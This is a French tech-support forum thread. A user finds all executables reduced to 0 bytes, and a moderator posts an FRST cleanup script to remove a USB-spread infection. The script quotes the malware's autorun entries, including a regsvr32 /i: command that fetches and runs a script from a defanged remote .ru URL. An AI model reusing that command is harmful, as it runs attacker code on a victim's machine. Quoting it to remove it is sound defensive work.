Menu

Infections virus fichier .EXE à 0 octet

- - Dernière réponse : Malekal_morte-
Messages postés
167793
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
13 juillet 2019
- 12 juil. 2019 à 16:49
Bonjour,
je rencontre un problème avec tous mes fichiers exécutables à 0 octet, voici mes liens (addition, FRST, shortcut)

https://pjjoint.malekal.com/files.php?id=FRST_20190712_g7f10l13d6r11
https://pjjoint.malekal.com/files.php?id=20190712_i1515u10x15k10
https://pjjoint.malekal.com/files.php?id=20190712_k12x7x15y86

Besoin d'aide svp
Afficher la suite 

1 réponse

Messages postés
167793
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
13 juillet 2019
16254
0
Merci
Salut,

C'est une infection qui va par USB.

A désinstaller inutile tout ça
Intel Security True Key
McAfee Security Scan Plus
Yahoo! Toolbar




Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Start:
CloseProcesses:
CreateRestorePoint:
C:\boots
HKU\S-1-5-21-1157558165-1950413523-3833716603-1000\...\Run: [syswin] => C:\boots\syswin.exe [4730812 2017-07-25] () [Fichier non signé]
HKU\S-1-5-21-1157558165-1950413523-3833716603-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATTENTION
ShortcutTarget: q.lnk -> C:\Users\HP\AppData\Roaming\eesw0EIW6g.exe ()
C:\Users\HP\AppData\Roaming\eesw0EIW6g.exe
EmptyTemp:
RemoveProxy:
Reboot:
End:


Enregistre le contenu par le menu fichier puis enregistrer.

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

Commenter la réponse de Malekal_morte-